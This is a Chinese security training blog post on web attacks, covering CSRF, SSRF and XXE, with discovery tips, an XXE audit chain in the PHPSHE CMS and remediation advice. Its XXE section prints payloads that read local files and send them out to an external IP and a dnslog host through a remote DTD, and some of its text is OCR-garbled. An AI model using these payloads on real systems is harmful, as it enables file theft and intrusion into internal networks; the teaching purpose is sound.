博主介绍

 博主介绍：大家好，我是 hacker-routing ，很高兴认识大家~
主攻领域：【渗透领域】【应急响应】 【Java、PHP】 【VulnHub靶场复现】【面试分析】
点赞评论收藏 == 养成习惯（一键三连）
欢迎关注一起学习一起讨论️一起进步文末有彩蛋
作者水平有限，欢迎各位大佬指点，相互学习进步！

---

目录

第39天:WEB攻防-通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用

0x1知识点：

0x2 CSRF攻击

0x3 CSRF攻击原理

0x4 SSRF漏洞

SSRF黑盒可能出现的地方：

第41天:WEB攻防-通用漏洞&XML&XXE&无回显&DTD实体&伪协议&代码审计

大纲

知识点：

XML简介

xxe漏洞

XXE黑盒发现

XXE白盒发现

XML&XOXE-白盒-CMS&PHPSHE&无回显亩计

XXE修复防御方案：

方案1-禁用外部实体

方案2-过滤用户提交的XML数据

---

第39天:WEB攻防-通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用

0x1知识点：

1、CSRF-原理&危害&探针&利用等

2、SSRF-原理&危害&探针&利用等

3、CSRF&SSRF-黑盒下漏洞探针点

0x2 CSRF攻击

CSRF的攻击过程两个条件：

1. 目标用户已经登录了网站，能够执行网站的功能。
2. 目标用户访问了攻击者构造的URL。

CSRF安全问题黑盒怎么判断：

1. 看验证来源不-修复
2. 看凭据有无token--修复
3. 看关键操作有无验证-修复

CSRF安全问题白盒怎么审计：

• 同黑盒思路一样，代码中分析上述三看

0x3 CSRF攻击原理

下面用个小案例进行分析讲解下：

1、Tom登录某银行网站，于是浏览器生成了Tom在该银行的的身份验证信息。

2、Jerry利用Sns.com服务器将伪造的转账请求包含在帖子中，并把帖子链接发给了Tom。

3、Tom在银行网站保持登录的情况下浏览帖子

4、这时Tom就在不知情的情况下将伪造的转账请求连同身份认证信息发送到银行网站。

5、银行网站看到身份认证信息，认为请求是Tom的合法操作

之后，银行网站会报据Tom的权限来处理Jerry所发起的恶意请求，这样Jerry就达到了伪造Tom的身份请求银行网站给自己转账的目的。

在此过程中受害者Tom只需要做下面两件事情，攻击者Jerry就能够完成CSRF攻击：

• 登录受信任银行网站，并生成身份验证信息；
• 在不登出银行网站(清除身份验证信息)的情况下，访问恶意站点Sns.com。

0x4 SSRF漏洞

SSRF全称：Server-Side Request Forgery，即 服务器端请求伪造。是一个由攻击者构造请求，在目标服务端执行的一个安全漏洞。攻击者可以利用该漏洞使服务器端向攻击者构造的任意域发出请求，目标通常是从外网无法访问的内部系统。简单来说就是利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网进行攻击。

SSRF黑盒可能出现的地方：

1.社交分享功能：获取超链接的标题等内容进行显示

2.转码服务：通过URL地址把原地址的网页内容调优使其适合手机屏幕浏览

3.在线翻译：给网址翻译对应网页的内容

4.图片加载/下载：例如富文本编辑器中的点击下载图片到本地；通过URL地址加载或下载图片

5.图片/文章收藏功能：主要其会取URL地址中title以及文本的内容作为显示以求一个好的用具体验

6.云服务厂商：它会远程执行一些命令来判断网站是否存活等，所以如果可以捕获相应的信息，就可以进行ssrf测试

7.网站采集，网站抓取的地方：一些网站会针对你输入的url进行一些信息采集工作

8.数据库内置功能：数据库的比如mongodb的copyDatabase函数

9.邮件系统：比如接收邮件服务器地址

10.编码处理, 属性信息处理，文件处理：比如ffpmg，ImageMagick，docx，pdf，xml处理器等

11.未公开的api实现以及其他扩展调用URL的功能：可以利用google 语法加上这些关键字去寻找SSRF漏洞 一些的url中的关键字：share、wap、url、link、src、source、target、u、3g、display、sourceURl、imageURL、domain……

12.从远程服务器请求资源（upload from url 如discuz！；import & expost rss feed 如web blog；使用了xml引擎对象的地方 如wordpress xmlrpc.php）

内网探针（端口字典爆破）--通过远程请求的方式，访问内网其他服务器。

第41天:WEB攻防-通用漏洞&XML&XXE&无回显&DTD实体&伪协议&代码审计

大纲

知识点：

1. XML&XXE-原理&发现&利用&修复等
2. ML&XXE黑盒模式下的发现与利用
3. XML&XXE-白盒模式下的审计与利用
4. XML&XXE-无回显&伪协议&产生层面

XML简介

XML被设计为传输和存储数据，ML文档结构包括XML声明、DTD文档类型定义（可选）、文档元素，其焦点是数据的内容，其把数据从HTML分离，是独立于软件和硬件的信息传输工具。

XML恶意注入参考文章：

https://www.cnblogs.com/20175211lyz/p/11413335.html

xxe漏洞

XXE漏洞全称KML External Entity Injection,即xml外部实体注入漏洞，XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。

一般xxe利用分为两大场景：有回显和无回显。有回显的情况可以直接在页面中看到Payload的执行结果或现象，无回显的情况又称为Blind XXE，可以使用外带数据通道提取数据。

XXE黑盒发现

1、获取得到Content-Type或数据类型为xml时，尝试进行xml语言payload进行测试
2、不管获取的Content-Type类型或数据传输类型，均可尝试修改后提交测试xxe
3、XXE不仅在数据传输上可能存在漏洞，同样在文件上传引用插件解析或预览也会造成文件中的XXE Payload被执行

XXE白盒发现

1、可通过应用功能追踪代码定位审计
2、可通过脚本特定函数搜索定位审计（xml）
3、可通过伪协议玩法绕过相关修复等

XML与HTML的主要差异：

XML被设计为传输和存储数据，其焦点是数据的内容。
HTML被设计用来显示数据，其焦点是数据的外观。
HTML旨在显示信息，而ⅫML雪在传输信息。

其于HTML的区别是：

• HTML 被设计用来显示数据
• XML 被设计用来传输和存储数据

XML文档结构包括：

• XML声明
• DTD文档类型定义（可选）
• 文档元素

先看一下典型的xml文档：

<!--XML声明-->
<?xml version="1.0" encoding="UTF-8"?>

<!--DTD，这部分可选的-->          
<!DOCTYPE foo [ 
    <!ELEMENT foo ANY >
    <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >
]>

<!--文档元素-->                                                                          
<foo>&xxe;</foo>

XML&XOXE-白盒-CMS&PHPSHE&无回显亩计

思路：通过全局搜索xml解析函数逐步找到存在漏洞的函数和文件–抓包改包测试若外带出数据则证明漏洞存在

审计流程： 

1、漏洞函数simplexml_load_string

2、pe_getxml函数调用了漏洞函数

3、wechat_getxmli谓用了pe_getxml

4、notify_urtg用了wechat_getxml

漏洞函数在自定义函数be getxmlg里面->谁调用了pe_getxml–>wechat_getxml–找到并访问存在漏洞的文件

访问notify_url文件触发wechat_getxmlE函数，构造Paylod测试

先尝试读取文件，无回显后带外测试：

<?xml version="1.0"?>
<IDOCTYPE test[
<IENTITY file SYSTEM "http://1uwlwv.dnslog.cn">
%file.
]>
<user><username>&send;</usemame><password>Mikasa</password></user>

然后带外传递数据解决无回显：

<?xml version="1.0"?>
<IDOCTYPE ANY[
<IENTITY file SYSTEM "file:///d:/e.txt">
<IENTITY remote SYSTEM "http://47.94.236.117/testdtd">
%remote;
%all;
]>
<root>&send:</root>
testdtd:
<IENTITY all "<IENTITY send SYSTEM 'http://47.94.236.117/get.php?file=%file;'>">

XXE修复防御方案：

方案1-禁用外部实体

PHP:

libxml_disable_entity_loader(true);

JAVA:

DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false);

Python：

from lxml import etreexmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

方案2-过滤用户提交的XML数据

过滤关键词：<!DOCTYPE和<!ENTITY，或者SYSTEM和PUBLIC